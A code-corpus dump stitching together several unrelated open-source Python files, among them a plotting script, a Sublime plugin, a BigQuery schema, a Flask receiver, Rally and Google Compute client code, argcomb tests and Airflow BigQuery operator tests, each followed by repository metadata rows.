set_box_color(bp_it, it_colors[title])
ot_value = df_ot_grouped.loc[title]
bp_ot = ax[plot_idx].boxplot(ot_value, positions=[idx * outer_space + inner_space],
sym='', widths=width)
set_box_color(bp_ot, ot_colors[title])
ax[plot_idx].tick_params(axis='x', which='both', bottom=False, top=False, labelbottom=False)
ax[plot_idx].set_title(METRICS_TITLE[plot_idx], fontdict=dict(fontsize=9))
ax[plot_idx].set_ylabel("mm", labelpad=2.0)
custom_legend_lines = [
Line2D([0], [0], color=color, lw=4)
for color in ot_colors.values()
]
fig.legend(custom_legend_lines, ot_colors.keys(), loc='upper right', ncol=(len(custom_legend_lines) // 4) + 1)
plt.tight_layout()
plt.subplots_adjust(wspace=0.3, top=0.75)
def main(args):
plot_bar = False
    df = pd.read_json(args.eval_path, dtype={'model': str, 'epoch': str})
# unsqueeze metrics list to rows
df = df.explode('metrics').reset_index()
# metrics dict to columns
df = df.drop('metrics', axis=1).join(pd.DataFrame(df.metrics.values.tolist())).drop('index', axis=1)
df.rename(columns={'it': 'input/target', 'ot': 'output/target'}, inplace=True)
# filter out trainer_ids
blacklisted_trainer_ids = ["1646936119.3354385", "1646987487.7802982", "1647161196.55366"]
df = df.loc[df['model'].apply(lambda x: x not in blacklisted_trainer_ids)]
df = df.set_index(['model', 'epoch'])
df = df.stack().to_frame(name='metrics')
df.index.set_names('it_ot', level=2, inplace=True)
df = df['metrics'].apply(pd.Series)
df = df.reset_index()
xticks = get_xticks(args.eval_path.parent, df['model'].to_list())
df.insert(0, 'title', df['model'].apply(lambda v: xticks[v]))
# df['title'] = df['title'] + "_" + df['epoch']
df = df.drop(['model', 'epoch'], axis=1)
if plot_bar:
generate_bar_plot(df)
else:
get_box_plot(df)
# plt.show()
plt.savefig(f"{args.eval_path.parent}/plt.png") # , bbox_inches='tight', pad_inches=0)
if __name__ == "__main__":
parser = ArgumentParser()
parser.add_argument("eval_path", type=Path)
main(parser.parse_args())
| 36.097297 | 116 | 0.628182 | [
"MIT"
] | alr-internship/self-supervised-depth-denoising | src/evaluate/plot_evaluation.py | 6,678 | Python |
from gosubl import gs
import os
import sublime_plugin
def _stx(v):
old = [
'GoSublime.tmLanguage',
'GoSublime-next.tmLanguage',
]
fn = 'Packages/GoSublime/syntax/GoSublime-Go.tmLanguage'
if not os.path.exists(gs.dist_path('syntax/GoSublime-Go.tmLanguage')):
return
stx = v.settings().get('syntax')
if stx:
name = stx.replace('\\', '/').split('/')[-1]
if name in old:
print('GoSublime: changing syntax of `%s` from `%s` to `%s`' % (
(v.file_name() or ('view://%s' % v.id())),
stx,
fn
))
v.set_syntax_file(fn)
class Ev(sublime_plugin.EventListener):
def on_load(self, view):
_stx(view)
def on_activated(self, view):
_stx(view)
| 20.424242 | 71 | 0.646884 | [
"MIT"
] | MiYogurt/my-sublimetext3-plugin | GoSublime/gssynforce.py | 674 | Python |
###########################################################################
#
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
###########################################################################
targetableRemarketingListsListResponse_Schema = [{
'description': '',
'name': 'kind',
'type': 'STRING',
'mode': 'NULLABLE'
}, {
'description': '',
'name': 'nextPageToken',
'type': 'STRING',
'mode': 'NULLABLE'
}, {
'name':
'targetableRemarketingLists',
'type':
'RECORD',
'mode':
'REPEATED',
'fields': [
{
'description': '',
'name': 'accountId',
'type': 'INT64',
'mode': 'NULLABLE'
}, {
'name': 'active',
'type': 'BOOLEAN',
'mode': 'NULLABLE'
}, {
'description': '',
'name': 'advertiserId',
'type': 'INT64',
'mode': 'NULLABLE'
},
[{
'description': '',
'name': 'dimensionName',
'type': 'STRING',
'mode': 'NULLABLE'
}, {
'description': '',
'name': 'etag',
'type': 'STRING',
'mode': 'NULLABLE'
}, {
'description': '',
'name': 'id',
'type': 'STRING',
'mode': 'NULLABLE'
}, {
'description': '',
'name': 'kind',
'type': 'STRING',
'mode': 'NULLABLE'
}, {
'description': 'BEGINS_WITH, CONTAINS, EXACT, WILDCARD_EXPRESSION',
'name': 'matchType',
'type': 'STRING',
'mode': 'NULLABLE'
}, {
'description': '',
'name': 'value',
'type': 'STRING',
'mode': 'NULLABLE'
}], {
'description': '',
'name': 'description',
'type': 'STRING',
'mode': 'NULLABLE'
}, {
'description': '',
'name': 'id',
'type': 'INT64',
'mode': 'NULLABLE'
}, {
'description': '',
'name': 'kind',
'type': 'STRING',
'mode': 'NULLABLE'
}, {
'description': '',
'name': 'lifeSpan',
'type': 'INT64',
'mode': 'NULLABLE'
}, {
'description': '',
'name': 'listSize',
'type': 'INT64',
'mode': 'NULLABLE'
}, {
'description':
'REMARKETING_LIST_SOURCE_ADX, REMARKETING_LIST_SOURCE_DBM, '
'REMARKETING_LIST_SOURCE_DFA, REMARKETING_LIST_SOURCE_DFP, '
'REMARKETING_LIST_SOURCE_DMP, REMARKETING_LIST_SOURCE_GA, '
'REMARKETING_LIST_SOURCE_GPLUS, REMARKETING_LIST_SOURCE_OTHER,'
' REMARKETING_LIST_SOURCE_PLAY_STORE, '
'REMARKETING_LIST_SOURCE_XFP, REMARKETING_LIST_SOURCE_YOUTUBE',
'name':
'listSource',
'type':
'STRING',
'mode':
'NULLABLE'
}, {
'description': '',
'name': 'name',
'type': 'STRING',
'mode': 'NULLABLE'
}, {
'description': '',
'name': 'subaccountId',
'type': 'INT64',
'mode': 'NULLABLE'
}
]
}]
| 29.559701 | 79 | 0.434991 | [
"Apache-2.0"
] | quan/starthinker | starthinker/task/dcm_api/schema/targetableRemarketingListsListResponse.py | 3,961 | Python |
from flask import Flask, request, jsonify
from flask_jsonrpc import JSONRPC
# import json_to_db
import psycopg2
import sys
from obs import *
import config
app = Flask(__name__)
app.config.from_object(config.DevelopmentMaxConfig)
jsonrpc = JSONRPC(app,'/api')
sys.path.insert(0,app.config['SQL_PATH'])
from sql_methods import *
sys.path.insert(0,app.config['SCRIPTS_PATH'])
from file_utils import insert_history_to_file
@app.route('/')
def index():
return "Template to recieve data"
@app.route('/api/get_history', methods=['GET', 'POST'])
def get_history():
content = request.get_json(force=True)
insert_history_to_file(content, HISTORY_PATH)
return jsonify(content)
@app.route('/api/get_content', methods=['GET', 'POST'])
def get_content():
content = ("""{}""".format(request.get_json(force=True))).replace('\'','\"')
if content != "[]" and content:
if content[0] != '[':
content = '[' + content + ']'
content += '\n\n'
# print(content)
client.put(content)
return jsonify(content)
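# Flow of /api/get_content (as written above): the posted JSON is stringified with double
# quotes, wrapped in brackets if needed, terminated by a blank line and pushed to the obs Client.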
if __name__ == '__main__':
client = Client("127.0.0.1", 8181, app.config['DB'], app.config['USER'], app.config['PASSWORD'], app.config['HOST'], app.config['PORT'])
app.run(host='127.0.0.1', port= 5000)
# json_insert.to_csv('/Users/MaximZubkov/Desktop/Programming/Python/Python_Project/analysis/son.csv')
client.close() | 27.895833 | 137 | 0.705751 | [
"MIT"
] | ilvivl/Python_Project | server_data_tmp/app/local_server.py | 1,339 | Python |
# Copyright 2015: Mirantis Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from rally import osclients
from rally.task import scenario
# NOTE(boris-42): Shortcut to remove import of both rally.task.scenario and
# rally.plugins.openstack.scenario
configure = scenario.configure
class OpenStackScenario(scenario.Scenario):
"""Base class for all OpenStack scenarios."""
def __init__(self, context=None, admin_clients=None, clients=None):
super(OpenStackScenario, self).__init__(context)
if context:
api_info = {}
if "api_versions" in context.get("config", {}):
api_versions = context["config"]["api_versions"]
for service in api_versions:
api_info[service] = {
"version": api_versions[service].get("version"),
"service_type": api_versions[service].get(
"service_type")}
if "admin" in context:
self._admin_clients = osclients.Clients(
context["admin"]["credential"], api_info)
if "user" in context:
self._clients = osclients.Clients(
context["user"]["credential"], api_info)
if admin_clients:
if hasattr(self, "_admin_clients"):
raise ValueError(
"Only one of context[\"admin\"] or admin_clients"
" must be supplied")
self._admin_clients = admin_clients
if clients:
if hasattr(self, "_clients"):
raise ValueError(
"Only one of context[\"user\"] or clients"
" must be supplied")
self._clients = clients
def clients(self, client_type, version=None):
"""Returns a python openstack client of the requested type.
The client will be that for one of the temporary non-administrator
users created before the benchmark launch.
:param client_type: Client type ("nova"/"glance" etc.)
:param version: client version ("1"/"2" etc.)
:returns: Standard python OpenStack client instance
"""
client = getattr(self._clients, client_type)
return client(version) if version is not None else client()
def admin_clients(self, client_type, version=None):
"""Returns a python admin openstack client of the requested type.
:param client_type: Client type ("nova"/"glance" etc.)
:param version: client version ("1"/"2" etc.)
:returns: Python openstack client object
"""
client = getattr(self._admin_clients, client_type)
return client(version) if version is not None else client()
| 39.52381 | 78 | 0.616867 | [
"Apache-2.0"
] | LorenzoBianconi/rally | rally/plugins/openstack/scenario.py | 3,320 | Python |
"""Tests for ArgComb. """
# pylint: disable=unused-argument, unused-variable
from typing import Any, Callable
import pytest
from argcomb import And, Else, InvalidArgumentCombination, Not, Or, Xor, argcomb
def test_default() -> None:
"""Test the ``default`` parameter of :function:``argcomb.__init__``.
This test also serves to check the basic functionality of
``argcomb`` for different types of signature: normal arguments,
keyword only arguments, positional only arguments, or any
combination of the above.
"""
def test_func(
func: Callable[..., None], kw_only_count: int, pos_only_count: int
) -> None:
"""Test a given function ``f``. """
with pytest.raises(InvalidArgumentCombination):
func()
if pos_only_count == 0:
func(a=1)
func(a=1, b=1)
func(a=1, b=None)
with pytest.raises(InvalidArgumentCombination):
func(a=None, b=1)
if kw_only_count < 2:
func(1)
if kw_only_count < 2 and pos_only_count < 2:
func(1, b=1)
func(1, b=None)
with pytest.raises(InvalidArgumentCombination):
func(None, b=1)
if kw_only_count == 0:
func(1, 1)
func(1, None)
with pytest.raises(InvalidArgumentCombination):
func(None, 1)
if pos_only_count < 2:
with pytest.raises(InvalidArgumentCombination):
func(b=1)
@argcomb("a")
def f(a: Any = None, b: Any = None) -> None:
...
test_func(f, kw_only_count=0, pos_only_count=0)
@argcomb("a")
def g(a: Any = None, *, b: Any = None) -> None:
...
test_func(g, kw_only_count=1, pos_only_count=0)
@argcomb("a")
def h(*, a: Any = None, b: Any = None) -> None:
...
test_func(h, kw_only_count=2, pos_only_count=0)
@argcomb("a")
def i(a: Any = None, /, b: Any = None) -> None:
...
test_func(i, kw_only_count=0, pos_only_count=1)
@argcomb("a")
def j(a: Any = None, b: Any = None, /) -> None:
...
test_func(j, kw_only_count=0, pos_only_count=2)
@argcomb("a")
def k(a: Any = None, /, *, b: Any = None) -> None:
...
test_func(k, kw_only_count=1, pos_only_count=1)
def test_argument_specs() -> None:
"""Test providing specifications for arguments. """
@argcomb(a="b", c="d")
def f(a: Any = None, b: Any = None, c: Any = None, d: Any = None) -> None:
...
# 9 valid combinations
f()
f(d=1)
f(c=1, d=1)
f(b=1)
f(b=1, d=1)
f(b=1, c=1, d=1)
f(a=1, b=1)
f(a=1, b=1, d=1)
f(a=1, b=1, c=1, d=1)
# 7 invalid combinations
with pytest.raises(InvalidArgumentCombination):
f(c=1)
with pytest.raises(InvalidArgumentCombination):
f(b=1, c=1)
with pytest.raises(InvalidArgumentCombination):
f(a=1)
with pytest.raises(InvalidArgumentCombination):
f(a=1, d=1)
with pytest.raises(InvalidArgumentCombination):
f(a=1, c=1)
with pytest.raises(InvalidArgumentCombination):
f(a=1, c=1, d=1)
with pytest.raises(InvalidArgumentCombination):
f(a=1, b=1, c=1)
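# (The combinations above exercise the rule that, with @argcomb(a="b", c="d"),
#  supplying ``a`` requires ``b`` and supplying ``c`` requires ``d``.)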
def test_value_dependent_specs() -> None:
"""Test specifications which depend on argument value. """
@argcomb(a={1: "b", 2: "c", 3: "d"})
def f(a: Any = None, b: Any = None, c: Any = None, d: Any = None) -> None:
...
# valid
f()
f(a=1, b=4)
f(a=2, c=5)
f(a=3, d=6)
f(a=1, b=4, c=5)
f(a=1, b=4, c=5, d=6)
f(a=1, b=4, d=6)
f(a=2, c=5, d=6)
f(a=4)
f(b=4, c=5)
f(d=6)
# invalid
with pytest.raises(InvalidArgumentCombination):
f(a=1, c=5)
with pytest.raises(InvalidArgumentCombination):
f(a=1, c=5, d=6)
with pytest.raises(InvalidArgumentCombination):
f(a=1)
with pytest.raises(InvalidArgumentCombination):
f(a=2, b=3)
with pytest.raises(InvalidArgumentCombination):
f(a=2, d=4)
with pytest.raises(InvalidArgumentCombination):
f(a=3, b=3, c=4)
with pytest.raises(InvalidArgumentCombination):
f(a=3)
def test_and() -> None:
"""Test ``And`` condition. """
@argcomb(And("a", "b"))
def f(a: Any = None, b: Any = None, c: Any = None) -> None:
...
# valid
f(a=1, b=2)
f(a=1, b=2, c=3)
# invalid
with pytest.raises(InvalidArgumentCombination):
f(a=1)
with pytest.raises(InvalidArgumentCombination):
f(b=1)
with pytest.raises(InvalidArgumentCombination):
f(a=1, b=None)
with pytest.raises(InvalidArgumentCombination):
f(a=None, b=1)
with pytest.raises(InvalidArgumentCombination):
f(a=1, c=1)
with pytest.raises(InvalidArgumentCombination):
f(b=1, c=1)
with pytest.raises(InvalidArgumentCombination):
f(c=1)
with pytest.raises(InvalidArgumentCombination):
f()
def test_or() -> None:
"""Test ``Or`` condition. """
@argcomb(Or("a", "b"))
def f(a: Any = None, b: Any = None) -> None:
...
# valid
f(a=1)
f(b=2)
f(a=1, b=2)
# invalid
with pytest.raises(InvalidArgumentCombination):
f()
def test_not() -> None:
"""Test ``Not`` condition. """
@argcomb(Not("a"))
def f(a: Any = None) -> None:
...
# valid
f()
# invalid
with pytest.raises(InvalidArgumentCombination):
f(a=1)
def test_xor() -> None:
"""Test ``Xor`` condition. """
@argcomb(Xor("a", "b", "c"))
def f(a: Any = None, b: Any = None, c: Any = None) -> None:
...
# valid
f(a=1)
f(b=1)
f(c=1)
# invalid
with pytest.raises(InvalidArgumentCombination):
f(a=1, b=1)
with pytest.raises(InvalidArgumentCombination):
f(a=1, c=1)
with pytest.raises(InvalidArgumentCombination):
f(b=1, c=1)
with pytest.raises(InvalidArgumentCombination):
f(a=1, b=1, c=1)
with pytest.raises(InvalidArgumentCombination):
f()
def test_else() -> None:
"""Test ``Else`` in value dependent specifications. """
@argcomb(a={1: "b", Else: "c"})
def f(a: Any = None, b: Any = None, c: Any = None) -> None:
...
# valid
f(a=2, c=1)
# invalid
with pytest.raises(InvalidArgumentCombination):
f(a=2, b=1)
def test_nested_condition() -> None:
"""Test a nested condition. """
@argcomb(Or(And("a", "b"), And("c", "d")))
def f(a: Any = None, b: Any = None, c: Any = None, d: Any = None) -> None:
...
# valid
f(a=1, b=1)
f(c=1, d=1)
f(a=1, b=1, c=1, d=1)
# invalid
with pytest.raises(InvalidArgumentCombination):
f(a=1)
with pytest.raises(InvalidArgumentCombination):
f(a=1, c=1)
with pytest.raises(InvalidArgumentCombination):
f()
def test_argument_named_default() -> None:
"""Test when an argument is named ``default``.
This collides with a positional only argument named ``default`` in
the ``argcomb`` signature, but as this is positional only this
should not matter.
"""
@argcomb(default="a")
def f(default: Any = None, a: Any = None) -> None:
...
f(a=1)
f(default=1, a=1)
with pytest.raises(InvalidArgumentCombination):
f(default=1)
def test_arguments_same_name() -> None:
"""Test that a warning is emitted when a function with two
identically named arguments. """
@argcomb(a="b")
def f(a: Any = None, /, b: Any = None, **kwargs: Any) -> None:
...
with pytest.warns(UserWarning):
f(1, 2, a=3) # pylint: disable=E1124
def test_default_arguments() -> None:
"""Test that default arguments are correctly recognised when they
are not ``None``. """
@argcomb(a="b")
def f(a: int = 1, b: int = 2) -> None:
...
# valid since ``a`` is the default value
f(a=1)
with pytest.raises(InvalidArgumentCombination):
# invalid since ``b`` is the default value
f(a=2, b=2)
def test_kwargs() -> None:
"""Test functionality when signature uses ``**kwargs``. """
@argcomb(a="b")
def f(**kwargs: Any) -> None:
...
f(a=1, b=1)
f(b=1, c=1)
with pytest.raises(InvalidArgumentCombination):
f(a=1)
| 24.459064 | 80 | 0.562941 | [
"MIT"
] | jacobunna/argcomb | test.py | 8,368 | Python |
# -*- coding: utf-8 -*-
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import abc
import typing
import pkg_resources
from google import auth # type: ignore
from google.api_core import exceptions # type: ignore
from google.api_core import gapic_v1 # type: ignore
from google.api_core import retry as retries # type: ignore
from google.auth import credentials # type: ignore
from google.cloud.compute_v1.types import compute
try:
DEFAULT_CLIENT_INFO = gapic_v1.client_info.ClientInfo(
gapic_version=pkg_resources.get_distribution("google-cloud-compute",).version,
)
except pkg_resources.DistributionNotFound:
DEFAULT_CLIENT_INFO = gapic_v1.client_info.ClientInfo()
class AddressesTransport(abc.ABC):
"""Abstract transport class for Addresses."""
AUTH_SCOPES = (
"https://www.googleapis.com/auth/compute",
"https://www.googleapis.com/auth/cloud-platform",
)
def __init__(
self,
*,
host: str = "compute.googleapis.com",
credentials: credentials.Credentials = None,
credentials_file: typing.Optional[str] = None,
scopes: typing.Optional[typing.Sequence[str]] = AUTH_SCOPES,
quota_project_id: typing.Optional[str] = None,
client_info: gapic_v1.client_info.ClientInfo = DEFAULT_CLIENT_INFO,
**kwargs,
) -> None:
"""Instantiate the transport.
Args:
host (Optional[str]): The hostname to connect to.
credentials (Optional[google.auth.credentials.Credentials]): The
authorization credentials to attach to requests. These
credentials identify the application to the service; if none
are specified, the client will attempt to ascertain the
credentials from the environment.
credentials_file (Optional[str]): A file with credentials that can
be loaded with :func:`google.auth.load_credentials_from_file`.
This argument is mutually exclusive with credentials.
            scopes (Optional[Sequence[str]]): A list of scopes.
quota_project_id (Optional[str]): An optional project to use for billing
and quota.
client_info (google.api_core.gapic_v1.client_info.ClientInfo):
The client info used to send a user-agent string along with
API requests. If ``None``, then default info will be used.
Generally, you only need to set this if you're developing
your own client library.
"""
# Save the hostname. Default to port 443 (HTTPS) if none is specified.
if ":" not in host:
host += ":443"
self._host = host
# If no credentials are provided, then determine the appropriate
# defaults.
if credentials and credentials_file:
raise exceptions.DuplicateCredentialArgs(
"'credentials_file' and 'credentials' are mutually exclusive"
)
if credentials_file is not None:
credentials, _ = auth.load_credentials_from_file(
credentials_file, scopes=scopes, quota_project_id=quota_project_id
)
elif credentials is None:
credentials, _ = auth.default(
scopes=scopes, quota_project_id=quota_project_id
)
# Save the credentials.
self._credentials = credentials
# Lifted into its own function so it can be stubbed out during tests.
self._prep_wrapped_messages(client_info)
def _prep_wrapped_messages(self, client_info):
# Precompute the wrapped methods.
self._wrapped_methods = {
self.aggregated_list: gapic_v1.method.wrap_method(
self.aggregated_list, default_timeout=None, client_info=client_info,
),
self.delete: gapic_v1.method.wrap_method(
self.delete, default_timeout=None, client_info=client_info,
),
self.get: gapic_v1.method.wrap_method(
self.get, default_timeout=None, client_info=client_info,
),
self.insert: gapic_v1.method.wrap_method(
self.insert, default_timeout=None, client_info=client_info,
),
self.list: gapic_v1.method.wrap_method(
self.list, default_timeout=None, client_info=client_info,
),
}
@property
def aggregated_list(
self,
) -> typing.Callable[
[compute.AggregatedListAddressesRequest],
typing.Union[
compute.AddressAggregatedList,
typing.Awaitable[compute.AddressAggregatedList],
],
]:
raise NotImplementedError()
@property
def delete(
self,
) -> typing.Callable[
[compute.DeleteAddressRequest],
typing.Union[compute.Operation, typing.Awaitable[compute.Operation]],
]:
raise NotImplementedError()
@property
def get(
self,
) -> typing.Callable[
[compute.GetAddressRequest],
typing.Union[compute.Address, typing.Awaitable[compute.Address]],
]:
raise NotImplementedError()
@property
def insert(
self,
) -> typing.Callable[
[compute.InsertAddressRequest],
typing.Union[compute.Operation, typing.Awaitable[compute.Operation]],
]:
raise NotImplementedError()
@property
def list(
self,
) -> typing.Callable[
[compute.ListAddressesRequest],
typing.Union[compute.AddressList, typing.Awaitable[compute.AddressList]],
]:
raise NotImplementedError()
__all__ = ("AddressesTransport",)
| 35.254237 | 86 | 0.646635 | [
"Apache-2.0"
] | igor-solomatov/python-compute | google/cloud/compute_v1/services/addresses/transports/base.py | 6,240 | Python |
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import unittest
from unittest import mock
from unittest.mock import MagicMock
import pytest
from google.cloud.exceptions import Conflict
from airflow.exceptions import AirflowException
from airflow.models import DAG
from airflow.providers.google.cloud.operators.bigquery import (
BigQueryCheckOperator,
BigQueryConsoleIndexableLink,
BigQueryConsoleLink,
BigQueryCreateEmptyDatasetOperator,
BigQueryCreateEmptyTableOperator,
BigQueryCreateExternalTableOperator,
BigQueryDeleteDatasetOperator,
BigQueryDeleteTableOperator,
BigQueryExecuteQueryOperator,
BigQueryGetDataOperator,
BigQueryGetDatasetOperator,
BigQueryGetDatasetTablesOperator,
BigQueryInsertJobOperator,
BigQueryIntervalCheckOperator,
BigQueryPatchDatasetOperator,
BigQueryUpdateDatasetOperator,
BigQueryUpdateTableOperator,
BigQueryUpdateTableSchemaOperator,
BigQueryUpsertTableOperator,
BigQueryValueCheckOperator,
)
from airflow.serialization.serialized_objects import SerializedDAG
from airflow.utils.timezone import datetime
from tests.test_utils.db import clear_db_dags, clear_db_runs, clear_db_serialized_dags, clear_db_xcom
TASK_ID = 'test-bq-generic-operator'
TEST_DATASET = 'test-dataset'
TEST_DATASET_LOCATION = 'EU'
TEST_GCP_PROJECT_ID = 'test-project'
TEST_DELETE_CONTENTS = True
TEST_TABLE_ID = 'test-table-id'
TEST_GCS_BUCKET = 'test-bucket'
TEST_GCS_DATA = ['dir1/*.csv']
TEST_SOURCE_FORMAT = 'CSV'
DEFAULT_DATE = datetime(2015, 1, 1)
TEST_DAG_ID = 'test-bigquery-operators'
TEST_TABLE_RESOURCES = {"tableReference": {"tableId": TEST_TABLE_ID}, "expirationTime": 1234567}
VIEW_DEFINITION = {
"query": f"SELECT * FROM `{TEST_DATASET}.{TEST_TABLE_ID}`",
"useLegacySql": False,
}
MATERIALIZED_VIEW_DEFINITION = {
'query': f'SELECT product, SUM(amount) FROM `{TEST_DATASET}.{TEST_TABLE_ID}` GROUP BY product',
'enableRefresh': True,
'refreshIntervalMs': 2000000,
}
class TestBigQueryCreateEmptyTableOperator(unittest.TestCase):
@mock.patch('airflow.providers.google.cloud.operators.bigquery.BigQueryHook')
def test_execute(self, mock_hook):
operator = BigQueryCreateEmptyTableOperator(
task_id=TASK_ID, dataset_id=TEST_DATASET, project_id=TEST_GCP_PROJECT_ID, table_id=TEST_TABLE_ID
)
operator.execute(None)
mock_hook.return_value.create_empty_table.assert_called_once_with(
dataset_id=TEST_DATASET,
project_id=TEST_GCP_PROJECT_ID,
table_id=TEST_TABLE_ID,
schema_fields=None,
time_partitioning={},
cluster_fields=None,
labels=None,
view=None,
materialized_view=None,
encryption_configuration=None,
table_resource=None,
exists_ok=False,
)
@mock.patch('airflow.providers.google.cloud.operators.bigquery.BigQueryHook')
def test_create_view(self, mock_hook):
operator = BigQueryCreateEmptyTableOperator(
task_id=TASK_ID,
dataset_id=TEST_DATASET,
project_id=TEST_GCP_PROJECT_ID,
table_id=TEST_TABLE_ID,
view=VIEW_DEFINITION,
)
operator.execute(None)
mock_hook.return_value.create_empty_table.assert_called_once_with(
dataset_id=TEST_DATASET,
project_id=TEST_GCP_PROJECT_ID,
table_id=TEST_TABLE_ID,
schema_fields=None,
time_partitioning={},
cluster_fields=None,
labels=None,
view=VIEW_DEFINITION,
materialized_view=None,
encryption_configuration=None,
table_resource=None,
exists_ok=False,
)
@mock.patch('airflow.providers.google.cloud.operators.bigquery.BigQueryHook')
def test_create_materialized_view(self, mock_hook):
operator = BigQueryCreateEmptyTableOperator(
task_id=TASK_ID,
dataset_id=TEST_DATASET,
project_id=TEST_GCP_PROJECT_ID,
table_id=TEST_TABLE_ID,
materialized_view=MATERIALIZED_VIEW_DEFINITION,
)
operator.execute(None)
mock_hook.return_value.create_empty_table.assert_called_once_with(
dataset_id=TEST_DATASET,
project_id=TEST_GCP_PROJECT_ID,
table_id=TEST_TABLE_ID,
schema_fields=None,
time_partitioning={},
cluster_fields=None,
labels=None,
view=None,
materialized_view=MATERIALIZED_VIEW_DEFINITION,
encryption_configuration=None,
table_resource=None,
exists_ok=False,
)
@mock.patch('airflow.providers.google.cloud.operators.bigquery.BigQueryHook')
def test_create_clustered_empty_table(self, mock_hook):
schema_fields = [
{"name": "emp_name", "type": "STRING", "mode": "REQUIRED"},
{"name": "date_hired", "type": "DATE", "mode": "REQUIRED"},
{"name": "date_birth", "type": "DATE", "mode": "NULLABLE"},
]
time_partitioning = {"type": "DAY", "field": "date_hired"}
cluster_fields = ["date_birth"]
operator = BigQueryCreateEmptyTableOperator(
task_id=TASK_ID,
dataset_id=TEST_DATASET,
project_id=TEST_GCP_PROJECT_ID,
table_id=TEST_TABLE_ID,
schema_fields=schema_fields,
time_partitioning=time_partitioning,
cluster_fields=cluster_fields,
)
operator.execute(None)
mock_hook.return_value.create_empty_table.assert_called_once_with(
dataset_id=TEST_DATASET,
project_id=TEST_GCP_PROJECT_ID,
table_id=TEST_TABLE_ID,
schema_fields=schema_fields,
time_partitioning=time_partitioning,
cluster_fields=cluster_fields,
labels=None,
view=None,
materialized_view=None,
encryption_configuration=None,
table_resource=None,
exists_ok=False,
)
class TestBigQueryCreateExternalTableOperator(unittest.TestCase):
@mock.patch('airflow.providers.google.cloud.operators.bigquery.BigQueryHook')
def test_execute(self, mock_hook):
operator = BigQueryCreateExternalTableOperator(
task_id=TASK_ID,
destination_project_dataset_table=f'{TEST_DATASET}.{TEST_TABLE_ID}',
schema_fields=[],
bucket=TEST_GCS_BUCKET,
source_objects=TEST_GCS_DATA,
source_format=TEST_SOURCE_FORMAT,
)
operator.execute(None)
mock_hook.return_value.create_external_table.assert_called_once_with(
external_project_dataset_table=f'{TEST_DATASET}.{TEST_TABLE_ID}',
schema_fields=[],
source_uris=[f'gs://{TEST_GCS_BUCKET}/{source_object}' for source_object in TEST_GCS_DATA],
source_format=TEST_SOURCE_FORMAT,
compression='NONE',
skip_leading_rows=0,
field_delimiter=',',
max_bad_records=0,
quote_character=None,
allow_quoted_newlines=False,
allow_jagged_rows=False,
src_fmt_configs={},
labels=None,
encryption_configuration=None,
)
class TestBigQueryDeleteDatasetOperator(unittest.TestCase):
@mock.patch('airflow.providers.google.cloud.operators.bigquery.BigQueryHook')
def test_execute(self, mock_hook):
operator = BigQueryDeleteDatasetOperator(
task_id=TASK_ID,
dataset_id=TEST_DATASET,
project_id=TEST_GCP_PROJECT_ID,
delete_contents=TEST_DELETE_CONTENTS,
)
operator.execute(None)
mock_hook.return_value.delete_dataset.assert_called_once_with(
dataset_id=TEST_DATASET, project_id=TEST_GCP_PROJECT_ID, delete_contents=TEST_DELETE_CONTENTS
)
class TestBigQueryCreateEmptyDatasetOperator(unittest.TestCase):
@mock.patch('airflow.providers.google.cloud.operators.bigquery.BigQueryHook')
def test_execute(self, mock_hook):
operator = BigQueryCreateEmptyDatasetOperator(
task_id=TASK_ID,
dataset_id=TEST_DATASET,
project_id=TEST_GCP_PROJECT_ID,
location=TEST_DATASET_LOCATION,
)
operator.execute(None)
mock_hook.return_value.create_empty_dataset.assert_called_once_with(
dataset_id=TEST_DATASET,
project_id=TEST_GCP_PROJECT_ID,
location=TEST_DATASET_LOCATION,
dataset_reference={},
exists_ok=False,
)
class TestBigQueryGetDatasetOperator(unittest.TestCase):
@mock.patch('airflow.providers.google.cloud.operators.bigquery.BigQueryHook')
def test_execute(self, mock_hook):
operator = BigQueryGetDatasetOperator(
task_id=TASK_ID, dataset_id=TEST_DATASET, project_id=TEST_GCP_PROJECT_ID
)
operator.execute(None)
mock_hook.return_value.get_dataset.assert_called_once_with(
dataset_id=TEST_DATASET, project_id=TEST_GCP_PROJECT_ID
)
class TestBigQueryUpdateTableOperator(unittest.TestCase):
@mock.patch('airflow.providers.google.cloud.operators.bigquery.BigQueryHook')
def test_execute(self, mock_hook):
table_resource = {"friendlyName": 'Test TB'}
operator = BigQueryUpdateTableOperator(
table_resource=table_resource,
task_id=TASK_ID,
dataset_id=TEST_DATASET,
table_id=TEST_TABLE_ID,
project_id=TEST_GCP_PROJECT_ID,
)
operator.execute(None)
mock_hook.return_value.update_table.assert_called_once_with(
table_resource=table_resource,
fields=None,
dataset_id=TEST_DATASET,
table_id=TEST_TABLE_ID,
project_id=TEST_GCP_PROJECT_ID,
)
class TestBigQueryUpdateTableSchemaOperator(unittest.TestCase):
